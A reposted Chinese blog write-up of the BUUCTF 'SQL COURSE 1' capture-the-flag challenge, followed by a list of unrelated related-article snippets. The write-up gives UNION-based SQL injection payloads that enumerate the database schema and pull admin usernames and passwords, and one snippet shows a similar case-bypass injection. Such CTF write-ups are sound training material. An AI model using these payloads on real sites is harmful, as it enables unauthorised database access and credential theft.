BUU SQL COURSE 1

BUU SQL COURSE 1

news/2024/11/15 12:08:43/文章来源:https://blog.csdn.net/qq_51802152/article/details/134805090

四

发现有登录框，爆破半天也爆破不出来，只能从别的地方下手了

F12一下

发现了一个传参

进去发现id可以传参，sql注入一下试试

前三个都有回显，当id=4的时候页面没有回显了，正好验证了页面有三个新闻

当order by =3的时候又没有回显了，这时可以判断有2个字段

当我们查询显错位的时候，发现页面没有变化，考虑到是不是过滤了什么

?id=-1 union select 1,2

于是在传参点把1改为-1 就可以看到页面有回显了

?id=-1 union select 1,database() 查库名

查表名

?id=-1 union select 1,table_name from information_schema.tables where table_schema='news'

查字段 ?id=-1 union select 1,column_name from information_schema.columns where table_name='admin'

这不是我们要的字段，我们要找的是username 和password

?id=-1 union select 1,column_name from information_schema.columns where table_name='admin' limit0,1

?id=-1 union select 1,column_name from information_schema.columns where table_name='admin' limit 2,1

查数据

?id=-1 union select 1,username from admin limit 0,1

?id=-1 union select 1,password from admin limit 0,1

拿着账号密码去登录

登录成功 flag就出来了

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/news/200623.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

相关文章

ROS-ROS通信机制-服务通信

ROS-ROS通信机制-服务通信

文章目录一、服务通信基本知识二、自定义srv三、C实现四、Python实现一、服务通信基本知识服务通信也是ROS中一种极其常用的通信模式，服务通信是基于请求响应模式的，是一种应答机制。也即: 一个节点A向另一个节点B发送请求，B接收处理请求…

阅读更多...

我想修改vCenter IP地址

我想修改vCenter IP地址

部署vCenter Server Appliance后，您可以在vCenter修改DNS设置并选择域名服务器使用。您可以编辑vCenter Server Appliance的IP地址设置。从vSphere 6.5开始正式支持vCenter修改IP地址。因此可以更改vCenter Server Appliance的IP地址和DNS设置。注意：更…

阅读更多...

Vue--第六天

Vue--第六天

vuex概述： 组件通信感觉有点白雪。。。。。。。。。。创建项目： 为了学习简介，先选几个，后续是要勾选很多的建好后再进行组件导入创建空仓库： 使用： 上面是store访问，下面是辅助函数的方式…

阅读更多...

centos 7.9 二进制部署 kubernetes v1.27.7

centos 7.9 二进制部署 kubernetes v1.27.7

文章目录 1. 预备条件2. 基础配置2.1 配置root远程登录2.2 配置主机名2.3 安装 ansible2.4 配置互信2.5 配置hosts文件2.6 关闭防firewalld火墙2.7 关闭 selinux2.8 关闭交换分区swap2.9 修改内核参数2.10 安装iptables2.11 开启ipvs2.12 配置limits参数2.13 配置 yum2.14 配置…

阅读更多...

HarmonyOS学习--TypeScript语言学习（二）

HarmonyOS学习--TypeScript语言学习（二）

本章目录如下： 一、基础类型二、运算符三、变量声明四、类型断言五、类型推断 TypeScript支持一些基础的数据类型，如布尔型、数组、字符串等，下文举例几个较为常用的数据类型，我们来了解下他们的基本使用。关于let 我们…

阅读更多...

ctfshow sql 186-190

ctfshow sql 186-190

186大小写绕过 1 order by 3-- 发现union select被过滤，用大小写来绕过 1 union seleCT 1,2,database() --1 union seleCT 1,2,table_name from information_schema.tables where table_schemactfshow_web --1 union seleCT 1,2,column_name from information_schem…

阅读更多...

Postman和Apifox针对不同环境、全局变量的使用与比较

Postman和Apifox针对不同环境、全局变量的使用与比较

文章目录一、Postman1、配置环境和全局变量2、验证3、存在问题分析二、Apifox1、配置环境和全局参数2、创建公共脚本3、测试总结一、Postman 1、配置环境和全局变量在Postman的界面中，点击"Environment"，添加我们需要的环境&#xff0c…

阅读更多...

数据库管理-第123期 Oracle相关两个参数（202301205）

数据库管理-第123期 Oracle相关两个参数（202301205）

数据库管理-第123期 Oracle相关两个参数（202301205） 最近在群聊中看到俩和Oracle数据库相关的俩参数，一个是Oracle数据库本身的，一个是来自于Weblogic的，挺有趣的，本期研究一下。（本期涉及参数…

阅读更多...

ppt转换成pdf文件

ppt转换成pdf文件

最近用到了，记一下； ppt转pdf分为两种情况: 小于2007版本的 .ppt格式（2003） 与大于2007版本的 .pptx格式（2007） .ppt格式为二进制文件 .pptx格式为xml格式，在java中有不同的jar包需要使用引入…

阅读更多...

uniapp踩坑之项目：使用过滤器将时间格式化为特定格式

利用filters过滤器对数据直接进行格式化，注意：与method、onLoad、data同层级 <template><div><p>{{ orderInfo.time | formatDate }}</p> <!-- 2023-1…

阅读更多...

springboot 集成Dubbo2.7.8 ，连接zookeeper 提示错误 zookeeper not connected

springboot 集成Dubbo2.7.8 ，连接zookeeper 提示错误 zookeeper not connected

Dubbo 连接zookeeper时，提示“zookeeper not connected” java.lang.IllegalStateException: zookeeper not connectedat org.apache.dubbo.remoting.zookeeper.curator.CuratorZookeeperClient.<init>(CuratorZookeeperClient.java:83) ~[dubbo-2.7.8.jar:2.…

阅读更多...

MySQL5 和 MySQL8 的配置区别一些注意事项

MySQL5 和 MySQL8 的配置区别一些注意事项

1、使用命令行查看MySQL的版本先保证你的mysql正在运行，假如用户名是root，密码是123456，运行下边的代码可以查看mysql的版本号。 mysql -uroot -p123456这里我的版本是5.7.19。也就是5版本的。 2、不同版本对应的数据库驱动jar包&#x…

阅读更多...

Object Detection in 20 Years: A Survey（2019.5）

Object Detection in 20 Years: A Survey（2019.5）

文章目录 Abstract1. Introduction1.1. Difference from other related reviews1.2. Difficulties and Challenges in Object Detection 2. OBJECT DETECTION IN 20 YEARS2.1. 目标检测路线图2.1.1. 里程碑:传统探测器（粗略了解）2.1.2. 里程碑:基于CNN的…

阅读更多...

朴素贝叶斯

朴素贝叶斯

朴素贝叶斯朴素贝叶斯理论贝叶斯决策理论条件概率全概率公式贝叶斯公式朴素贝叶斯言论屏蔽新浪新闻分类朴素贝叶斯算法的优缺点朴素贝叶斯算法是一种基于贝叶斯定理的有监督的机器学习算法，解决的是分类问题，如文本分类、垃圾邮件过滤、客户是否流失&…

阅读更多...

CFS三层靶机内网渗透

CFS三层靶机内网渗透

CFS三层靶机内网渗透一、靶场搭建1.基础参数信息2.靶场搭建2.1网卡配置2.2Target1配置2.2.1 网卡配置2.2.2 Target1 BT配置 2.3Target2配置2.3.1 网卡配置2.3.2 Target2 BT配置 2.4Target3配置二、内网渗透Target11.1信息收集1.1.1IP收集1.1.2端口收集1.1.3目录收集 1.2 webs…

阅读更多...

SQL错题集2

SQL错题集2

1.插入记录用户1001在2021年9月1日晚上10点11分12秒开始作答试卷9001，并在50分钟后提交，得了90分； 用户1002在2021年9月4日上午7点1分2秒开始作答试卷9002，并在10分钟后退出了平台。 2.请把exam_record表中2021年9月1日之前开始作…

阅读更多...

电子学会C/C++编程等级考试2023年03月（四级）真题解析

电子学会C/C++编程等级考试2023年03月（四级）真题解析

C/C++等级考试（1~8级）全部真题・点这里第1题：最佳路径如下所示的由正整数数字构成的三角形: 7 3 8 8 1 0 2 7 4 4 4 5 2 6 5 从三角形的顶部到底部有很多条不同的路径。对于每条路径，把路径上面的数加起来可以得到一个和，和最大的路径称为最佳路径。你的任务就是求出最…

阅读更多...

Linux之重谈文件和c语言文件接口

Linux之重谈文件和c语言文件接口

重谈文件文件内容属性, 所有对文件的操作都是: a.对内容操作 b.对属性操作关于文件一： 即使文件的内容为空，该文件也会在磁盘上也会占空间，因为文件不仅仅只有内容还有文件对应的属性，文件的内容会占用空间, 文件的属性也…

阅读更多...

Linux基本指令（2.0）

Linux基本指令（2.0）

周边知识： 1.Linux中， 一切皆文件构建大文件输入如下shell命令 i1; while [ $i -le 10000]; do echo "hello Linux $i"; let i; done 此时大文件已经创建在big.txt 此时我们发现cat查看无法查看开始内容我们使用more 当占满一屏之后就不…

阅读更多...

Unity-Shader - 2DSprite描边效果

Unity-Shader - 2DSprite描边效果

实现一个简单的2D精灵图描边效果，效果如下实现思路： 可以通过判断该像素周围是否有透明度为 0的值，如果有，则说明该像素位于边缘。所以我们需要打开alpha blend，即： Blend SrcAlpha OneMinusSrcAlpha&am…

阅读更多...

推荐文章

最新文章